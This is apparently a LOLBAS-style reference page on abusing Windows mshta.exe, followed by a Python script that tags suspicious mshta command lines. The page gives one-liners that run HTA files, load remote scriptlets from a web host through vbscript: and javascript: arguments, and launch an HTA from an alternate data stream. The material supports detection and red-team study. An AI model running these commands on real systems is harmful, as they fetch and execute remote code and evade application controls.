~/Privilege Escalation/Windows/Binaries# cat Mshta.exe.md
Used by Windows to execute HTML Applications (.hta).
Paths:
C:\Windows\System32\mshta.exe
C:\Windows\SysWOW64\mshta.exe
Detection:
mshta.exe executing raw or obfuscated script within the command line
Usage of HTA file
Execute
Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
mshta.exe evilfile.hta
Executes VBScript supplied as a command line argument.
mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
Executes JavaScript supplied as a command line argument.
mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
Alternate data streams
Opens the target .HTA stored in an alternate data stream and executes embedded JavaScript, JScript, or VBScript.
mshta.exe "C:\ads\file.txt:file.hta"
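
The detection note above, applied to the usages listed on this page, as an added example that is not part of the original page: it tags process-creation command lines as inline script, script: moniker, HTA file, or alternate-data-stream HTA. The function name, tag names, and sample command lines (with a placeholder host) are assumptions constructed for illustration.

```python
import re

# Added example: tag names and sample command lines are constructed for illustration.
MSHTA = re.compile(r'(?i)(?:^|[\\/\s"])mshta(?:\.exe)?(?=["\s]|$)')  # image name, any path/case
INLINE = re.compile(r'(?i)(vbscript|javascript)\s*:')   # script passed as the argument
MONIKER = re.compile(r'(?i)GetObject\s*\(\s*"*script:')  # scriptlet loaded via script: moniker
ADS = re.compile(r'(?i)(?:[a-z]:|\\\\)[^":]*\\[^"\\:]+:[^"\\:]+')  # drive/UNC path plus :stream
HTA = re.compile(r'(?i)\.hta(?=["\s]|$)')               # .hta file argument


def classify(cmdline):
    """Return sorted detection tags for one process command line ([] if nothing matches)."""
    m = MSHTA.search(cmdline)
    if not m:
        return []
    # Everything after the image name, minus the quote that closes a quoted image path.
    args = cmdline[m.end():].strip().lstrip('"').strip()
    tags = set()
    if INLINE.match(args):
        tags.add("inline-script")
        if MONIKER.search(args):
            tags.add("script-moniker")
    else:
        # Only drive-letter and UNC paths are checked for a stream name; a relative
        # "name:stream" argument is ambiguous with the "scheme:" form and is skipped.
        if ADS.match(args):
            tags.add("ads-hta")
        if HTA.search(args):
            tags.add("hta-file")
    return sorted(tags)


SAMPLES = [  # constructed command lines; example.invalid is a placeholder host
    r'mshta.exe evilfile.hta',
    r'"C:\Windows\System32\mshta.exe" vbscript:Close(Execute("GetObject(""script:https://example.invalid/payload.sct"")"))',
    r'C:\Windows\SysWOW64\MSHTA.EXE JavaScript:a=GetObject("script:https://example.invalid/p.sct").Exec();close();',
    r'mshta.exe "C:\ads\file.txt:file.hta"',
    r'notepad.exe C:\notes\mshta.txt',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line), "<-", line)
```

Matching is case-insensitive only; command lines that split or encode the `vbscript:` / `javascript:` prefix need normalisation before these patterns apply.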